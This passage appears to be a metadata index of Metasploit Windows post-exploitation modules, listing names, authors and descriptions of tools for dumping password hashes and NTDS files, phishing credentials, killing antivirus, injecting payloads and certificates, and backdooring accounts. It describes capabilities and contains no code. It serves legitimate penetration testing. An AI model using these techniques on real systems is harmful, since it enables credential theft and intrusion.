"name": "Generate CSV Organizational Chart Data Using Manager Information",
"full_name": "post/windows/gather/make_csv_orgchart",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Stuart Morgan <stuart.morgan@mwrinfosecurity.com>"
],
"description": "This module will generate a CSV file containing all users and their managers, which can be\n imported into Visio which will render it.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/make_csv_orgchart.rb",
"is_install_path": true,
"ref_name": "windows/gather/make_csv_orgchart",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/memory_grep": {
"name": "Windows Gather Process Memory Grep",
"full_name": "post/windows/gather/memory_grep",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"bannedit <bannedit@metasploit.com>"
],
"description": "This module allows for searching the memory space of a process for potentially\n sensitive data. Please note: When the HEAP option is enabled, the module will have\n to migrate to the process you are grepping, and will not migrate back automatically.\n This means that if the user terminates the application after using this module, you\n may lose your session.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/post/windows/gather/memory_grep.rb",
"is_install_path": true,
"ref_name": "windows/gather/memory_grep",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/netlm_downgrade": {
"name": "Windows NetLM Downgrade Attack",
"full_name": "post/windows/gather/netlm_downgrade",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Brandon McCann \"zeknox\" <bmccann@accuvant.com>",
"Thomas McCarthy \"smilingraccoon\" <smilingraccoon@gmail.com>"
],
"description": "This module will change a registry value to enable\n the sending of LM challenge hashes and then initiate a SMB connection to\n the SMBHOST datastore. If an SMB server is listening, it will receive the\n NetLM hashes",
"references": [
"URL-http://www.fishnetsecurity.com/6labs/blog/post-exploitation-using-netntlm-downgrade-attacks"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/netlm_downgrade.rb",
"is_install_path": true,
"ref_name": "windows/gather/netlm_downgrade",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/ntds_grabber": {
"name": "NTDS Grabber",
"full_name": "post/windows/gather/ntds_grabber",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Koen Riepe (koen.riepe <Koen Riepe (koen.riepe@fox-it.com)>"
],
"description": "This module uses a powershell script to obtain a copy of the ntds,dit SAM and SYSTEM files on a domain controller.\n It compresses all these files in a cabinet file called All.cab.",
"references": [
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-06-26 08:22:11 +0000",
"path": "/modules/post/windows/gather/ntds_grabber.rb",
"is_install_path": true,
"ref_name": "windows/gather/ntds_grabber",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/ntds_location": {
"name": "Post Windows Gather NTDS.DIT Location",
"full_name": "post/windows/gather/ntds_location",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Stuart Morgan <stuart.morgan@mwrinfosecurity.com>"
],
"description": "This module will find the location of the NTDS.DIT file (from the Registry),\n check that it exists, and display its location on the screen, which is useful\n if you wish to manually acquire the file using ntdsutil or vss.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/ntds_location.rb",
"is_install_path": true,
"ref_name": "windows/gather/ntds_location",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/outlook": {
"name": "Windows Gather Outlook Email Messages",
"full_name": "post/windows/gather/outlook",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Wesley Neelen <security@forsec.nl>"
],
"description": "This module allows reading and searching email messages from the local\n Outlook installation using PowerShell. Please note that this module is\n manipulating the victims keyboard/mouse. If a victim is active on the target\n system, he may notice the activities of this module. Tested on Windows 8.1\n x64 with Office 2013.",
"references": [
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/outlook.rb",
"is_install_path": true,
"ref_name": "windows/gather/outlook",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/phish_windows_credentials": {
"name": "Windows Gather User Credentials (phishing)",
"full_name": "post/windows/gather/phish_windows_credentials",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Wesley Neelen <security@forsec.nl>",
"Matt Nelson"
],
"description": "This module is able to perform a phishing attack on the target by popping up a loginprompt.\n When the user fills credentials in the loginprompt, the credentials will be sent to the attacker.\n The module is able to monitor for new processes and popup a loginprompt when a specific process is starting. Tested on Windows 7.",
"references": [
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/phish_windows_credentials.rb",
"is_install_path": true,
"ref_name": "windows/gather/phish_windows_credentials",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/psreadline_history": {
"name": "Windows Gather PSReadline History",
"full_name": "post/windows/gather/psreadline_history",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Garvit Dewan <d.garvit@gmail.com>"
],
"description": "Gathers Power Shell history data from the target machine.",
"references": [
"URL-https://docs.microsoft.com/en-us/powershell/module/psreadline/",
"URL-https://github.com/KalibRx/PoshHarvestPy/blob/master/poshharvest.py",
"URL-https://0xdf.gitlab.io/2018/11/08/powershell-history-file.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-02-13 12:38:36 +0000",
"path": "/modules/post/windows/gather/psreadline_history.rb",
"is_install_path": true,
"ref_name": "windows/gather/psreadline_history",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/resolve_sid": {
"name": "Windows Gather Local User Account SID Lookup",
"full_name": "post/windows/gather/resolve_sid",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"chao-mu"
],
"description": "This module prints information about a given SID from the perspective of this session",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/resolve_sid.rb",
"is_install_path": true,
"ref_name": "windows/gather/resolve_sid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/reverse_lookup": {
"name": "Windows Gather IP Range Reverse Lookup",
"full_name": "post/windows/gather/reverse_lookup",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"mubix <mubix@hak5.org>"
],
"description": "This module uses Railgun, calling the gethostbyaddr function to resolve a hostname\n to an IP.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/reverse_lookup.rb",
"is_install_path": true,
"ref_name": "windows/gather/reverse_lookup",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/screen_spy": {
"name": "Windows Gather Screen Spy",
"full_name": "post/windows/gather/screen_spy",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Roni Bachar <roni.bachar.blog@gmail.com>",
"bannedit <bannedit@metasploit.com>",
"kernelsmith <kernelsmith /x40 kernelsmith /x2E com>",
"Adrian Kubok"
],
"description": "This module will incrementally take desktop screenshots from the host. This\n allows for screen spying which can be useful to determine if there is an active\n user on a machine, or to record the screen for later data extraction.\n\n Note: As of March, 2014, the VIEW_CMD option has been removed in\n favor of the Boolean VIEW_SCREENSHOTS option, which will control if (but\n not how) the collected screenshots will be viewed from the Metasploit\n interface.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-06-12 17:11:29 +0000",
"path": "/modules/post/windows/gather/screen_spy.rb",
"is_install_path": true,
"ref_name": "windows/gather/screen_spy",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/smart_hashdump": {
"name": "Windows Gather Local and Domain Controller Account Password Hashes",
"full_name": "post/windows/gather/smart_hashdump",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This will dump local accounts from the SAM Database. If the target\n host is a Domain Controller, it will dump the Domain Account Database using the proper\n technique depending on privilege level, OS and role of the host.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/smart_hashdump.rb",
"is_install_path": true,
"ref_name": "windows/gather/smart_hashdump",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/tcpnetstat": {
"name": "Windows Gather TCP Netstat",
"full_name": "post/windows/gather/tcpnetstat",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"mubix <mubix@hak5.org>"
],
"description": "This Module lists current TCP sessions",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/tcpnetstat.rb",
"is_install_path": true,
"ref_name": "windows/gather/tcpnetstat",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/usb_history": {
"name": "Windows Gather USB Drive History",
"full_name": "post/windows/gather/usb_history",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"nebulus"
],
"description": "This module will enumerate USB Drive history on a target host.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/usb_history.rb",
"is_install_path": true,
"ref_name": "windows/gather/usb_history",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/win_privs": {
"name": "Windows Gather Privileges Enumeration",
"full_name": "post/windows/gather/win_privs",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Merlyn Cousins <drforbin6@gmail.com>"
],
"description": "This module will print if UAC is enabled, and if the current account is\n ADMIN enabled. It will also print UID, foreground SESSION ID, is SYSTEM status\n and current process PRIVILEGES.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-19 01:35:19 +0000",
"path": "/modules/post/windows/gather/win_privs.rb",
"is_install_path": true,
"ref_name": "windows/gather/win_privs",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/wmic_command": {
"name": "Windows Gather Run Specified WMIC Command",
"full_name": "post/windows/gather/wmic_command",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module will execute a given WMIC command options or read\n WMIC commands options from a resource file and execute the commands in the\n specified Meterpreter session.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/wmic_command.rb",
"is_install_path": true,
"ref_name": "windows/gather/wmic_command",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/word_unc_injector": {
"name": "Windows Gather Microsoft Office Word UNC Path Injector",
"full_name": "post/windows/gather/word_unc_injector",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"SphaZ <cyberphaz@gmail.com>"
],
"description": "This module modifies a remote .docx file that will, upon opening, submit\n stored netNTLM credentials to a remote host. Verified to work with Microsoft\n Word 2003, 2007, 2010, and 2013. In order to get the hashes the\n auxiliary/server/capture/smb module can be used.",
"references": [
"URL-http://jedicorp.com/?p=534"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/word_unc_injector.rb",
"is_install_path": true,
"ref_name": "windows/gather/word_unc_injector",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/add_user_domain": {
"name": "Windows Manage Add User to the Domain and/or to a Domain Group",
"full_name": "post/windows/manage/add_user_domain",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Joshua Abraham <jabra@rapid7.com>"
],
"description": "This module adds a user to the Domain and/or to a Domain group. It will\n check if sufficient privileges are present for certain actions and run\n getprivs for system. If you elevated privs to system, the\n SeAssignPrimaryTokenPrivilege will not be assigned. You need to migrate to\n a process that is running as system. If you don't have privs, this script\n exits.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/post/windows/manage/add_user_domain.rb",
"is_install_path": true,
"ref_name": "windows/manage/add_user_domain",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/archmigrate": {
"name": "Architecture Migrate",
"full_name": "post/windows/manage/archmigrate",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Koen Riepe (koen.riepe <Koen Riepe (koen.riepe@fox-it.com)>"
],
"description": "This module checks if the meterpreter architecture is the same as the OS architecture and if it's incompatible it spawns a\n new process with the correct architecture and migrates into that process.",
"references": [
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/archmigrate.rb",
"is_install_path": true,
"ref_name": "windows/manage/archmigrate",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/change_password": {
"name": "Windows Manage Change Password",
"full_name": "post/windows/manage/change_password",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module will attempt to change the password of the targeted account.\n The typical usage is to change a newly created account's password on a\n remote host to avoid the error, 'System error 1907 has occurred,' which\n is caused when the account policy enforces a password change before the\n next login.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/change_password.rb",
"is_install_path": true,
"ref_name": "windows/manage/change_password",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/clone_proxy_settings": {
"name": "Windows Manage Proxy Setting Cloner",
"full_name": "post/windows/manage/clone_proxy_settings",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"mubix <mubix@hak5.org>"
],
"description": "This module copies the proxy settings from the current user to the\n targeted user SID, supports remote hosts as well if remote registry\n is allowed.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/clone_proxy_settings.rb",
"is_install_path": true,
"ref_name": "windows/manage/clone_proxy_settings",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/delete_user": {
"name": "Windows Manage Local User Account Deletion",
"full_name": "post/windows/manage/delete_user",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"chao-mu"
],
"description": "This module deletes a local user account from the specified server,\n or the local machine if no server is given.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/delete_user.rb",
"is_install_path": true,
"ref_name": "windows/manage/delete_user",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/download_exec": {
"name": "Windows Manage Download and/or Execute",
"full_name": "post/windows/manage/download_exec",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"RageLtMan"
],
"description": "This module will download a file by importing urlmon via railgun.\n The user may also choose to execute the file with arguments via exec_string.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/download_exec.rb",
"is_install_path": true,
"ref_name": "windows/manage/download_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/driver_loader": {
"name": "Windows Manage Driver Loader",
"full_name": "post/windows/manage/driver_loader",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "This module loads a KMD (Kernel Mode Driver) using the Windows Service API.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/driver_loader.rb",
"is_install_path": true,
"ref_name": "windows/manage/driver_loader",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/enable_rdp": {
"name": "Windows Manage Enable Remote Desktop",
"full_name": "post/windows/manage/enable_rdp",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module enables the Remote Desktop Service (RDP). It provides the options to create\n an account and configure it to be a member of the Local Administrators and\n Remote Desktop Users group. It can also forward the target's port 3389/tcp.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-21 22:46:30 +0000",
"path": "/modules/post/windows/manage/enable_rdp.rb",
"is_install_path": true,
"ref_name": "windows/manage/enable_rdp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/enable_support_account": {
"name": "Windows Manage Trojanize Support Account",
"full_name": "post/windows/manage/enable_support_account",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"salcho <salchoman@gmail.com>"
],
"description": "This module enables alternative access to servers and workstations\n by modifying the support account's properties. It will enable\n the account for remote access as the administrator user while\n taking advantage of some weird behavior in lusrmgr.msc. It will\n check if sufficient privileges are available for registry operations,\n otherwise it exits.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/enable_support_account.rb",
"is_install_path": true,
"ref_name": "windows/manage/enable_support_account",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"post_windows/manage/exec_powershell": {
"name": "Windows Powershell Execution Post Module",
"full_name": "post/windows/manage/exec_powershell",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Nicholas Nam (nick <Nicholas Nam (nick@executionflow.org)>",
"RageLtMan"
],
"description": "This module will execute a powershell script in a meterpreter session.\n The user may also enter text substitutions to be made in memory before execution.\n Setting VERBOSE to true will output both the script prior to execution and the results.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/exec_powershell.rb",
"is_install_path": true,
"ref_name": "windows/manage/exec_powershell",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/forward_pageant": {
"name": "Forward SSH Agent Requests To Remote Pageant",
"full_name": "post/windows/manage/forward_pageant",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Stuart Morgan <stuart.morgan@mwrinfosecurity.com>",
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module forwards SSH agent requests from a local socket to a remote Pageant instance.\n If a target Windows machine is compromised and is running Pageant, this will allow the\n attacker to run normal OpenSSH commands (e.g. ssh-add -l) against the Pageant host which are\n tunneled through the meterpreter session. This could therefore be used to authenticate\n with a remote host using a private key which is loaded into a remote user's Pageant instance,\n without ever having knowledge of the private key itself.\n\n Note that this requires the PageantJacker meterpreter extension, but this will be automatically\n loaded into the remote meterpreter session by this module if it is not already loaded.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/post/windows/manage/forward_pageant.rb",
"is_install_path": true,
"ref_name": "windows/manage/forward_pageant",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/hashcarve": {
"name": "Windows Local User Account Hash Carver",
"full_name": "post/windows/manage/hashcarve",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"p3nt4"
],
"description": "This module will change a local user's password directly in the registry.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/hashcarve.rb",
"is_install_path": true,
"ref_name": "windows/manage/hashcarve",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/ie_proxypac": {
"name": "Windows Manage Proxy PAC File",
"full_name": "post/windows/manage/ie_proxypac",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "This module configures Internet Explorer to use a PAC proxy file. By using the LOCAL_PAC\n option, a PAC file will be created on the victim host. It's also possible to provide a\n remote PAC file (REMOTE_PAC option) by providing the full URL.",
"references": [
"URL-https://www.youtube.com/watch?v=YGjIlbBVDqE&hd=1",
"URL-http://blog.scriptmonkey.eu/bypassing-group-policy-using-the-windows-registry"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/ie_proxypac.rb",
"is_install_path": true,
"ref_name": "windows/manage/ie_proxypac",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/inject_ca": {
"name": "Windows Manage Certificate Authority Injection",
"full_name": "post/windows/manage/inject_ca",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"vt <nick.freeman@security-assessment.com>"
],
"description": "This module allows the attacker to insert an arbitrary CA certificate\n into the victim's Trusted Root store.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/inject_ca.rb",
"is_install_path": true,
"ref_name": "windows/manage/inject_ca",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/inject_host": {
"name": "Windows Manage Hosts File Injection",
"full_name": "post/windows/manage/inject_host",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"vt <nick.freeman@security-assessment.com>"
],
"description": "This module allows the attacker to insert a new entry into the target\n system's hosts file.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-06-12 17:11:29 +0000",
"path": "/modules/post/windows/manage/inject_host.rb",
"is_install_path": true,
"ref_name": "windows/manage/inject_host",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/killav": {
"name": "Windows Post Kill Antivirus and Hips",
"full_name": "post/windows/manage/killav",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Marc-Andre Meloche (MadmanTM)",
"Nikhil Mittal (Samratashok)",
"Jerome Athias",
"OJ Reeves"
],
"description": "This module attempts to locate and terminate any processes that are identified\n as being Antivirus or Host-based IPS related.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/killav.rb",
"is_install_path": true,
"ref_name": "windows/manage/killav",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/migrate": {
"name": "Windows Manage Process Migration",
"full_name": "post/windows/manage/migrate",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module will migrate a Meterpreter session from one process\n to another. A given process PID to migrate to or the module can spawn one and\n migrate to that newly spawned process.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/migrate.rb",
"is_install_path": true,
"ref_name": "windows/manage/migrate",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/mssql_local_auth_bypass": {
"name": "Windows Manage Local Microsoft SQL Server Authorization Bypass",
"full_name": "post/windows/manage/mssql_local_auth_bypass",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Scott Sutherland <scott.sutherland@netspi.com>"
],
"description": "When this module is executed, it can be used to add a sysadmin to local\n SQL Server instances. It first attempts to gain LocalSystem privileges\n using the \"getsystem\" escalation methods. If those privileges are not\n sufficient to add a sysadmin, then it will migrate to the SQL Server\n service process associated with the target instance. The sysadmin\n login is added to the local SQL Server using native SQL clients and\n stored procedures. If no instance is specified then the first identified\n instance will be used.\n\n Why is this possible? By default in SQL Server 2k-2k8, LocalSystem\n is assigned syadmin privileges. Microsoft changed the default in\n SQL Server 2012 so that LocalSystem no longer has sysadmin privileges.\n However, this can be overcome by migrating to the SQL Server process.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/mssql_local_auth_bypass.rb",
"is_install_path": true,
"ref_name": "windows/manage/mssql_local_auth_bypass",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/multi_meterpreter_inject": {
"name": "Windows Manage Inject in Memory Multiple Payloads",
"full_name": "post/windows/manage/multi_meterpreter_inject",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>",
"David Kennedy \"ReL1K\" <kennedyd013@gmail.com>"
],
"description": "This module will inject in to several processes a given\n payload and connecting to a given list of IP Addresses.\n The module works with a given lists of IP Addresses and\n process PIDs if no PID is given it will start a the given\n process in the advanced options and inject the selected\n payload in to the memory of the created module.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/multi_meterpreter_inject.rb",
"is_install_path": true,
"ref_name": "windows/manage/multi_meterpreter_inject",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/nbd_server": {
"name": "Windows Manage Local NBD Server for Remote Disks",
"full_name": "post/windows/manage/nbd_server",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Wesley McGrew <wesley@mcgrewsecurity.com>"
],
"description": "Maps remote disks and logical volumes to a local Network Block\n Device server. Allows for forensic tools to be executed on the remote disk directly.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/nbd_server.rb",
"is_install_path": true,
"ref_name": "windows/manage/nbd_server",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/payload_inject": {
"name": "Windows Manage Memory Payload Injection Module",
"full_name": "post/windows/manage/payload_inject",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>",
"David Kennedy \"ReL1K\" <kennedyd013@gmail.com>"
],
"description": "This module will inject into the memory of a process a specified windows payload.\n If a payload or process is not provided one will be created by default\n using a reverse x86 TCP Meterpreter Payload.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/payload_inject.rb",
"is_install_path": true,
"ref_name": "windows/manage/payload_inject",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/peinjector": {
"name": "Peinjector",
"full_name": "post/windows/manage/peinjector",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Maximiliano Tedesco <maxitedesco1@gmail.com>"
],
"description": "This module will inject a specified windows payload into a target executable.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-08-28 11:33:17 +0000",
"path": "/modules/post/windows/manage/peinjector.rb",
"is_install_path": true,
"ref_name": "windows/manage/peinjector",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
